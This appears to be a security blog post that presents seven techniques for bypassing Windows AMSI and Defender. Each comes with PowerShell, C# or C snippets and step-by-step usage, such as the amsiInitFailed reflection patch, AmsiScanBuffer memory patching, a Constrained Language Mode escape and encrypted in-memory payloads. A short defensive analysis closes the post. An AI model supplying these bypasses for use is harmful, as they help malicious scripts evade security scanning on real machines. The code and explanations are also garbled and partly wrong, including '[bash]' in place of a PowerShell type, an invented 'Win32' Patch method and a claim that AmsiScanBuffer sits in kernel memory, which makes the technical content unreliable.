AMSI Bypass Techniques: Evolution, Exploitation, and Defense

Listen to this Post

🐢▶️ Listen🚀

Introduction:

The Antimalware Scan Interface (AMSI) is a critical Windows security feature enabling real-time script scanning. Attackers continually develop bypass techniques to evade detection, with reflection-based methods posing significant threats. Shaquib Izhar’s updated AMSI Bypass Generator exemplifies this arms race, automating novel reflection bypasses targeting Windows Defender.

Learning Objectives:

• Understand AMSI architecture and common bypass vectors.
• Execute and analyze reflection-based AMSI bypasses.
• Implement defenses against dynamic bypass techniques.

1. AMSI Context Initialization Bypass

[bash].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Step-by-Step Guide:

1. Purpose: Disables AMSI by forcing initialization failure.

2. Usage:

• Open PowerShell.
• Paste the command to patch the `amsiInitFailed` flag.

3. Effect: Subsequent malicious scripts evade AMSI scans.

2. Memory Patching via Reflection

$Win32 = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076) 
[bash].Assembly.GetType('Win32').GetMethod('Patch').Invoke($null, @($Win32, [Byte[]](0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3))) 

Step-by-Step Guide:

1. Purpose: Overwrites AMSI function pointers in memory.

2. Usage:

• Allocate memory with AllocHGlobal.
• Inject shellcode (e.g., 0xB8...) to disable AmsiScanBuffer.

3. Effect: Bypasses signature-based detection for PowerShell payloads.

3. CLM Bypass with Constrained Language Mode

$ExecutionContext.SessionState.LanguageMode = "FullLanguage" 

Step-by-Step Guide:

1. Purpose: Escapes PowerShell’s Constrained Language Mode (CLM).

2. Usage:

• Execute in a CLM-locked session.
• Sets language mode to “FullLanguage,” enabling unrestricted code execution.

1. Effect: Unblocks AMSI bypass modules like AmsiScanBuffer patchers.

4. API Obfuscation for Defender Evasion

$Hash = [System.Security.Cryptography.SHA256]::Create().ComputeHash([Text.Encoding]::UTF8.GetBytes('amsiInit')) 
$API = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc $Hash), $DelegateType) 

Step-by-Step Guide:

1. Purpose: Dynamically resolves APIs via hashing to evade static signatures.

2. Usage:

• Hash critical API names (e.g., AmsiScanBuffer).
• Resolve function pointers at runtime.

3. Effect: Bypasses Defender’s signature-based hooks.

5. .NET Reflection for AMSI Unhooking

var amsiContext = typeof(PSObject).Assembly.GetType("System.Management.Automation.AmsiUtils"); 
var field = amsiContext.GetField("amsiSession", BindingFlags.NonPublic | BindingFlags.Static); 
field.SetValue(null, IntPtr.Zero); 

Step-by-Step Guide:

1. Purpose: Nullifies AMSI’s session context via .NET reflection.

2. Usage:

• Compile as a C class in PowerShell using Add-Type.
• Execute to reset amsiSession.

1. Effect: Forces AMSI to reinitialize, crashing active scans.

6. Heap Encryption for In-Memory Payloads

$Payload = [System.Text.Encoding]::UTF8.GetBytes("MaliciousPayload") 
$Encrypted = [Security.Cryptography.ProtectedData]::Protect($Payload, $null, 'CurrentUser') 
[Runtime.InteropServices.Marshal]::Copy($Encrypted, 0, $Alloc, $Encrypted.Length) 

Step-by-Step Guide:

1. Purpose: Encrypts payloads using Windows DPAPI.

2. Usage:

• Encrypt payloads with ProtectedData::Protect.
• Copy to executable memory.

1. Effect: Evades in-memory scanners like AMSI and Defender’s runtime inspection.

7. Syscall Stomping for Kernel-Level Evasion

NtProtectVirtualMemory(GetCurrentProcess(), &baseAddr, &size, PAGE_EXECUTE_READWRITE, &oldProtect); 
memcpy((void)amsiScanBufferAddr, shellcode, shellcode_len); 

Step-by-Step Guide:

1. Purpose: Directly patches `AmsiScanBuffer` in kernel memory.

2. Usage:

• Use direct syscalls (NtProtectVirtualMemory) to modify memory permissions.
• Overwrite `AmsiScanBuffer` with benign shellcode.

3. Effect: Bypasses user- and kernel-mode hooks.

What Undercode Say:

Key Takeaway 1: Automation tools like Izhar’s generator democratize advanced bypasses, lowering entry barriers for attackers.
Key Takeaway 2: Defender-specific bypasses highlight the fragility of signature-dependent security.

Analysis:

The rise of dynamically generated AMSI bypasses signals a shift toward ephemeral, polymorphic attacks. Traditional static detection is increasingly ineffective, as each generator iteration produces unique bypass variants. Defenders must prioritize behavior-based monitoring (e.g., detecting abnormal PowerShell reflection) and restrict scripting privileges. Future threats will likely blend AI-generated code with API unhooking, forcing adoption of hardware-enforced security (e.g., Kernel DMA Protection). Proactive threat hunting for AMSI tampering artifacts—such as `amsiInitFailed` modifications—is now essential.

IT/Security Reporter URL:

Reported By: Shaquib Izhar – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin